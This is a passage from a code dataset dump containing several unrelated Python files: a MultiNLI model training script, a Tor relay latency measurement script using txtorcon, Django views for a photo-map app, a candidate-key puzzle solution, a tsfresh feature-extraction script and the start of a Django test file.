self.batch_size)\n dev_acc_mismat, dev_cost_mismat = evaluate_classifier(self.classify, dev_mismat, self.batch_size)\n\n logger.log(\"Epoch %i, step %i\\tMultiNLI train acc: %f\\tMultiNLI train cost: %f\" % (\n self.epoch, self.step, mtrain_acc, mtrain_cost))\n logger.log(\"Epoch %i, step %i\\tDev-matched acc: %f\\tDev-mismatched acc: %f\\tDev-matched cost: %f\"\n \"\\tDev-mismatched cost: %f\" % (self.epoch, self.step, dev_acc_mat,\n dev_acc_mismat, dev_cost_mat, dev_cost_mismat))\n\n self.saver.save(self.sess, ckpt_file)\n best_test = 100 * (1 - self.best_dev_mat / dev_acc_mat)\n if best_test > 0.04:\n self.saver.save(self.sess, ckpt_file + \"_best\")\n self.best_dev_mat = dev_acc_mat\n self.best_mtrain_acc = mtrain_acc\n # if self.alpha != 0.:\n # self.best_strain_acc = strain_acc\n self.best_step = self.step\n logger.log(\"==== Checkpointing with new best matched-dev accuracy: %f\" % self.best_dev_mat)\n\n self.step += 1\n\n # Display some statistics about the epoch\n if self.epoch % self.display_epoch_freq == 0:\n logger.log(\"======= Epoch: %i\\tAvg. Cost: %f\" % (self.epoch + 1, avg_cost))\n\n self.epoch += 1\n self.last_train_acc[(self.epoch % 5) - 1] = mtrain_acc\n\n # Early stopping\n progress = 1000 * (sum(self.last_train_acc) / (5 * min(self.last_train_acc)) - 1)\n\n if (progress < 0.1) or (self.step > self.best_step + 30000):\n logger.log(\"Best matched-dev accuracy: %s\" % self.best_dev_mat)\n logger.log(\"MultiNLI Train accuracy: %s\" % self.best_mtrain_acc)\n self.completed = True\n break\n\n def classify(self, examples):\n # This classifies a list of examples\n if test or self.completed:\n best_path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt_best\"\n self.sess = tf.Session()\n self.sess.run(self.init)\n self.saver.restore(self.sess, best_path)\n logger.log(\"Model restored from file: %s\" % best_path)\n\n total_batch = int(len(examples) / self.batch_size)\n logits = np.empty(3)\n cost = 0\n genres = []\n for i in range(total_batch):\n minibatch_premise_vectors, minibatch_hypothesis_vectors, minibatch_labels, minibatch_genres, \\\n minibatch_prem_dep, minibatch_hypo_dep = \\\n self.get_minibatch(examples, self.batch_size * i, self.batch_size * (i + 1))\n feed_dict = {self.model.premise_x: minibatch_premise_vectors,\n self.model.hypothesis_x: minibatch_hypothesis_vectors,\n self.model.y: minibatch_labels,\n self.model.keep_rate_ph: 1.0}\n if 'dep_avg' in self.model_type:\n feed_dict[self.model.prem_dep] = minibatch_prem_dep\n feed_dict[self.model.hypo_dep] = minibatch_hypo_dep\n genres += minibatch_genres\n logit, cost = self.sess.run([self.model.logits, self.model.total_cost], feed_dict)\n logits = np.vstack([logits, logit])\n\n return genres, np.argmax(logits[1:], axis=1), cost\n\n def restore(self, best=True):\n if best:\n path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt_best\"\n else:\n path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt\"\n self.sess = tf.Session()\n self.sess.run(self.init)\n self.saver.restore(self.sess, path)\n logger.log(\"Model restored from file: %s\" % path)\n\n\nclassifier = ModelClassifier()\n\n\"\"\"\nEither train the model and then run it on the test-sets or\nload the best checkpoint and get accuracy on the test set. Default setting is to train the model.\n\"\"\"\n\ntest = params.train_or_test()\n\n# While test-set isn't released, use dev-sets for testing\ntest_matched = dev_matched\ntest_mismatched = dev_mismatched\n\nif not test:\n classifier.train(training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli)\n logger.log(\"Acc on matched multiNLI dev-set: %s\" %\n (evaluate_classifier(classifier.classify, test_matched, FIXED_PARAMETERS[\"batch_size\"]))[0])\n logger.log(\"Acc on mismatched multiNLI dev-set: %s\" %\n (evaluate_classifier(classifier.classify, test_mismatched, FIXED_PARAMETERS[\"batch_size\"]))[0])\n logger.log(\"Acc on SNLI test-set: %s\" %\n (evaluate_classifier(classifier.classify, test_snli, FIXED_PARAMETERS[\"batch_size\"]))[0])\nelse:\n results = evaluate_final(classifier.restore, classifier.classify, [test_matched, test_mismatched, test_snli],\n FIXED_PARAMETERS[\"batch_size\"])\n logger.log(\"Acc on multiNLI matched dev-set: %s\" % (results[0]))\n logger.log(\"Acc on multiNLI mismatched dev-set: %s\" % (results[1]))\n logger.log(\"Acc on SNLI test set: %s\" % (results[2]))\n\n # Results by genre,\n logger.log(\"Acc on matched genre dev-sets: %s\" % (\n evaluate_classifier_genre(classifier.classify, test_matched, FIXED_PARAMETERS[\"batch_size\"])[0]))\n logger.log(\"Acc on mismatched genres dev-sets: %s\" % (\n evaluate_classifier_genre(classifier.classify, test_mismatched, FIXED_PARAMETERS[\"batch_size\"])[0]))\n", "sub_path": "train_mnli.py", "file_name": "train_mnli.py", "file_ext": "py", "file_size_in_byte": 18572, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.parameters.load_parameters", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.parameters", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.logger.Logger", "line_number": 20, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 66, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 72, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 79, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 86, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 104, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 104, "usage_type": "name"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 118, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 161, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 161, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 166, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 172, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 179, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 180, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 180, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 183, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 184, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 212, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 212, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 233, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 233, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 248, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 254, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 263, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 264, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 275, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 275, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 303, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.parameters.train_or_test", "line_number": 316, "usage_type": "call"}, {"api_name": "utils.parameters", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 324, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 324, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 326, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 326, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 328, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 328, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 333, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 334, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 334, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 335, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 335, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 338, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 338, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 340, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 340, "usage_type": "name"}]} +{"seq_id": "635138384", "text": "import asyncio\nimport datetime\nimport json\nimport os\nimport time\nimport txtorcon\nimport urllib.request\n\nfrom twisted.internet import asyncioreactor\nfrom twisted.internet.defer import ensureDeferred, Deferred\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.internet.task import react\nfrom twisted.web.client import readBody\n\ndef write_json(filestem, data):\n now = datetime.datetime.now().strftime(\"%Y%m%d_%H%M\");\n print(data)\n jsonStr = json.dumps(data)\n with open(filestem + \"_\" + now + \".json\", \"w\") as f:\n f.write(jsonStr)\n with open(filestem + \"_latest.json\", \"w\") as f:\n f.write(jsonStr)\n\ndef relay_data(exits):\n url = \"https://onionoo.torproject.org/details?type=relay&fields=nickname,fingerprint,as_name,country_name,contact,platform,or_addresses,bandwidth_rate,exit_probability\"\n if exits:\n url += \"&flag=exit\"\n req = urllib.request.Request(url)\n response = urllib.request.urlopen(req).read()\n data = json.loads(response.decode('utf-8'))\n return data[\"relays\"]\n\nasync def launch_tor(reactor):\n control_ep = TCP4ClientEndpoint(reactor, \"localhost\", 9051)\n tor = await txtorcon.connect(reactor, control_ep, password_function = lambda: \"bilboBaggins789\")\n #tor = await txtorcon.launch(reactor, progress_updates=print, data_directory=\"./tor_data\")\n config = await tor.get_config()\n state = await tor.create_state()\n socks = await config.create_socks_endpoint(reactor, \"9050\")\n print(\"Connected to tor {}\".format(tor.version))\n return [tor, config, state, socks]\n\nasync def time_two_hop(reactor, state, socks, guard, exit_node):\n circuit = await state.build_circuit(routers = [guard, exit_node], using_guards = False)\n #circuit = await state.build_circuit(routers = [exit_node], using_guards = False)\n await circuit.when_built()\n # print(\"Circuit\", circuit.id, circuit.path)\n t_start = time.time()\n agent = circuit.web_agent(reactor, socks)\n resp = await agent.request(b'HEAD', b\"http://example.com\")\n t_stop = time.time()\n return t_stop - t_start\n\ndef record_result(results, fingerprint, address, result, delta):\n if address not in results:\n results[address] = {}\n if fingerprint not in results[address]:\n results[address][fingerprint] = []\n dateString = str(datetime.datetime.now())\n results[address][fingerprint].append((result, dateString, delta))\n\nasync def test_exits(reactor, state, socks, guard, exits, repeats):\n exit_results = {}\n n = len(exits)\n for i in range(repeats):\n j = 0\n for exit_node in exits:\n j = j + 1\n result = \"\"\n delta = -1\n try:\n delta = await time_two_hop(reactor, state, socks, guard, exit_node)\n result = \"SUCCEEDED\"\n except Exception as err:\n result = str(err)\n record_result(exit_results, exit_node.id_hex, \"example.com\", result, delta)\n print('%d/%d: %d/%d' % (i+1, repeats, j, n), exit_node.id_hex, \":\", exit_results[\"example.com\"][exit_node.id_hex])\n return exit_results\n\nasync def test_relays(reactor, state, socks, relays, exit_node, repeats):\n relay_results = {}\n n = len(relays)\n for i in range(repeats):\n j = 0\n for relay in relays:\n j = j + 1\n result = \"\"\n delta = -1\n try:\n delta = await time_two_hop(reactor, state, socks, relay, exit_node)\n result = \"SUCCEEDED\"\n except Exception as err:\n result = str(err)\n record_result(relay_results, relay.id_hex, \"example.com\", result, delta)\n print('%d/%d: %d/%d' % (i+1, repeats, j, n), relay.id_hex, \":\", relay_results[\"example.com\"][relay.id_hex])\n return relay_results\n\nasync def _main(reactor):\n [tor, config, state, socks] = await launch_tor(reactor)\n config.CircuitBuildTimeout = 10\n config.SocksTimeout = 10\n config.CircuitStreamTimeout = 10\n config.save()\n routers = state.all_routers\n\n guard1 = state.routers_by_hash[\"$F6740DEABFD5F62612FA025A5079EA72846B1F67\"]\n exits = list(filter(lambda router: \"exit\" in router.flags, routers))\n exit_results = await test_exits(reactor, state, socks, guard1, exits, 10)\n exit_results[\"_relays\"] = relay_data(True)\n write_json(\"../all_exit_results/exit_results\", exit_results)\n\n exit_node = state.routers_by_hash[\"$1AE949967F82BBE7534A3D6BA77A7EBE1CED4369\"]\n relays = list(filter(lambda router: \"exit\" not in router.flags, routers))\n relay_results = await test_relays(reactor, state, socks, relays, exit_node, 3)\n relay_results[\"_relays\"] = relay_data(False)\n write_json(\"../all_relay_results/relay_results\", relay_results)\n\ndef main():\n return react(\n lambda reactor: ensureDeferred(\n _main(reactor)\n )\n )\n\nif __name__ == '__main__':\n main()\n", "sub_path": "relay_perf.py", "file_name": "relay_perf.py", "file_ext": "py", "file_size_in_byte": 4906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.request.request.Request", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 28, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 28, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}, {"api_name": "twisted.internet.endpoints.TCP4ClientEndpoint", "line_number": 34, "usage_type": "call"}, {"api_name": "txtorcon.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "twisted.internet.task.react", "line_number": 119, "usage_type": "call"}, {"api_name": "twisted.internet.defer.ensureDeferred", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "194413387", "text": "from django.conf import settings\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse, HttpResponse\nfrom django.http.response import HttpResponseForbidden, HttpResponseBadRequest\nfrom django.views.generic.base import TemplateView, View\nfrom django.urls import reverse\nfrom django.core.cache import cache\n\nfrom map.models import District, PhotoTimor, IstoriaViazen, CommentPhoto\n\nclass VueView(TemplateView):\n template_name = 'vue_ui/index.html'\n\n def get_context_data(self, *args, **kwargs):\n context = {\n 'urls': dict(\n openstreetmap=settings.OPENSTREETMAP_URL,\n geojson=reverse(\"api_geojson\"),\n images=reverse(\"api_images\"),\n commentphoto=reverse(\"api_commentphoto\"),\n istoriaviazen=reverse(\"api_istoriaviazen\"),\n login=reverse(\"api_login\"),\n add_journey=reverse(\"api_add_istoria\"),\n add_comment=reverse(\"api_add_comment\"),\n media_url=settings.MEDIA_URL,\n )\n }\n return context\n\nclass AddIstoriaView(View):\n def post(self, request, *args, **kwargs):\n istoria = IstoriaViazen.objects.create(\n title=request.POST[\"title\"],\n description=request.POST[\"description\"],\n duration_of_trip=(request.POST[\"fromDate\"], request.POST[\"toDate\"]),\n creator=request.user,\n )\n response_data = {\n \"istoria\": istoria.to_json(),\n \"photos\": [],\n }\n for photo_file in self.request.FILES.getlist('photos'):\n photo = PhotoTimor.objects.create(istoriaviazen=istoria, image=photo_file)\n response_data[\"photos\"].append(photo.to_json())\n\n return JsonResponse(response_data)\n\ndef login_api(request):\n if request.user.is_authenticated:\n response = JsonResponse(\n {'name': request.user.get_full_name()\n })\n else:\n response = HttpResponse(status=401, reason=\"You need to login\")\n return response\n\ndef geojson_api(request):\n geojson = cache.get('api_geojson')\n if geojson == None:\n geojson = serialize('geojson', District.objects.all(), geometry_field='geom')\n cache.set('api_geojson', geojson)\n response = HttpResponse(geojson, content_type=\"application/json\")\n return response\n\ndef images_api(request):\n images = [\n p.to_json()\n for p in PhotoTimor.objects.all().select_related(\"istoriaviazen\", \"istoriaviazen__creator\")\n ]\n response = JsonResponse(images, safe=False)\n return response\n\ndef istoriaviazen_api(request):\n viazen = [\n v.to_json()\n for v in IstoriaViazen.objects.all().select_related('creator')\n ]\n response = JsonResponse(viazen, safe=False)\n return response\n\ndef commentphoto_api(request):\n comment = [\n c.to_json()\n for c in CommentPhoto.objects.filter(is_public=True).select_related('user')\n ]\n response = JsonResponse(comment, safe=False)\n return response\n\n\nclass AddCommentView(View):\n def post(self, request, *args, **kwargs):\n\n if \"comments\" not in request.POST:\n return HttpResponseBadRequest()\n\n if \"phototimor\" not in request.POST:\n return HttpResponseForbidden()\n\n http_x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if http_x_forwarded_for:\n ip_address = http_x_forwarded_for.split(',')[0]\n else:\n ip_address = request.META.get('REMOTE_ADDR')\n\n comment = CommentPhoto.objects.create(\n phototimor=PhotoTimor.objects.get(id=request.POST[\"phototimor\"]),\n comment=request.POST[\"comments\"],\n ip_address=ip_address,\n user=request.user,\n )\n response_data = {\n \"comment\": comment.to_json(),\n }\n return JsonResponse(response_data)\n\n\n", "sub_path": "vue_ui/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3897, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.base.TemplateView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.OPENSTREETMAP_URL", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "django.views.generic.base.View", "line_number": 30, "usage_type": "name"}, {"api_name": "map.models.IstoriaViazen.objects.create", "line_number": 32, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "map.models.IstoriaViazen", "line_number": 32, "usage_type": "name"}, {"api_name": "map.models.PhotoTimor.objects.create", "line_number": 43, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 58, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 60, "usage_type": "call"}, {"api_name": "map.models.District.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "map.models.District.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "map.models.District", "line_number": 60, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 61, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects.all", "line_number": 68, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 68, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects.all", "line_number": 76, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "map.models.IstoriaViazen", "line_number": 76, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "map.models.CommentPhoto", "line_number": 84, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 86, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 90, "usage_type": "name"}, {"api_name": "django.http.response.HttpResponseBadRequest", "line_number": 94, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseForbidden", "line_number": 97, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects.create", "line_number": 105, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "map.models.CommentPhoto", "line_number": 105, "usage_type": "name"}, {"api_name": "map.models.PhotoTimor.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 106, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "42417144", "text": "# combinations 아이디어까지는 잘 떠올렸으나\n# 중복제거 부분을 생각못해버렸네\n# 다시 풀어보자\nfrom itertools import combinations\ndef solution(relation):\n\n nR = len(relation)\n nC = len(relation[0])\n\n candi = []\n for i in range(1,nC+1) :\n candi.extend(combinations(range(nC),i))\n \n ans = []\n for keys in candi :\n tmp = [tuple([val[key] for key in keys]) for val in relation]\n if len(set(tmp)) == nR :\n ans.append(keys)\n \n ret = set(ans)\n for i in range(len(ans)) :\n for j in range(i+1,len(ans)) :\n if len(ans[i]) == len(set(ans[i]).intersection(ans[j])) :\n ret.discard(ans[j])\n\n return len(ret)\n\n\n\nrelation = [[\"100\",\"ryan\",\"music\",\"2\"],\n [\"200\",\"apeach\",\"math\",\"2\"],\n [\"300\",\"tube\",\"computer\",\"3\"],\n [\"400\",\"con\",\"computer\",\"4\"],\n [\"500\",\"muzi\",\"music\",\"3\"],\n [\"600\",\"apeach\",\"music\",\"2\"]]\n\n\nprint(solution(relation))\n", "sub_path": "programmers/kakao/LEVEL2_후보키.py", "file_name": "LEVEL2_후보키.py", "file_ext": "py", "file_size_in_byte": 1006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "174465801", "text": "import pandas as pd\r\nfrom tsfresh.utilities.dataframe_functions import impute\r\nfrom tsfresh import extract_features\r\n\r\n\r\ndef handle_y(y):\r\n y = y.drop_duplicates(subset=['id', 'y'], keep='first')\r\n y = y.reset_index(drop=True)\r\n y = y.iloc[:, -1]\r\n\r\n return y\r\n\r\n\r\n# 有效特征\r\ndef get_features(file_name, count):\r\n csv_data = pd.read_csv(file_name)\r\n timeseries = csv_data.iloc[:, :-1]\r\n del timeseries['Unnamed: 0']\r\n y = csv_data[['id', 'y']]\r\n y = handle_y(y)\r\n\r\n print(timeseries)\r\n print(y)\r\n\r\n print('start getfeatures...')\r\n # 全部特征\r\n extracted_features = extract_features(timeseries, column_id=\"id\", column_sort=\"time\")\r\n impute(extracted_features)\r\n extracted_features.to_csv('tsfresh_extractedFeatures' + str(count) + '.csv')\r\n print(str(count) + ' end')\r\n\r\n\r\ndef get_features_thread():\r\n _error = []\r\n\r\n for i in range(0, 30):\r\n try:\r\n temp = 'control_data_' + str(i) + '.csv'\r\n get_features(temp, i)\r\n except Exception:\r\n print(str(i) + ' is error')\r\n _error.append(str(i))\r\n\r\n for i in range(30, 111):\r\n try:\r\n temp = 'patient_data_' + str(i) + '.csv'\r\n get_features(temp, i)\r\n except Exception:\r\n print(str(i) + ' is error')\r\n _error.append(str(i))\r\n\r\n print(_error)\r\n\r\ndef start():\r\n get_features_thread()\r\n", "sub_path": "features/alpha1_110/thread_cal_features.py", "file_name": "thread_cal_features.py", "file_ext": "py", "file_size_in_byte": 1416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "tsfresh.extract_features", "line_number": 27, "usage_type": "call"}, {"api_name": "tsfresh.utilities.dataframe_functions.impute", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "15437428", "text": "from django.test import TestCase\n\nfrom oauth2_provider.models import AccessToken\nfrom geokey.applications.tests.model_factories import ApplicationFactory\n\nfrom .model_factories import UserGroupF, UserF\nfrom ..models import UserGroup\n\n\nclass UserTest(TestCase):\n def test_reset_password(self):\n user = UserF.create()\n app = ApplicationFactory.create()\n AccessToken.objects.create(\n user=user,\n application=app,\n token='df0af6a395b4cd072445b3832e9379bfee257da0',\n scope=1,\n expires='2030-12-31 23:59'\n )\n\n user.reset_password('123456')\n\n self.assertEqual(0, AccessToken.objects.filter(user=user).count())\n\n\nclass UserGroupPreSaveSignalTest(TestCase):\n def test_contribute_and_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_moderate = True\n usergroup.save()\n\n 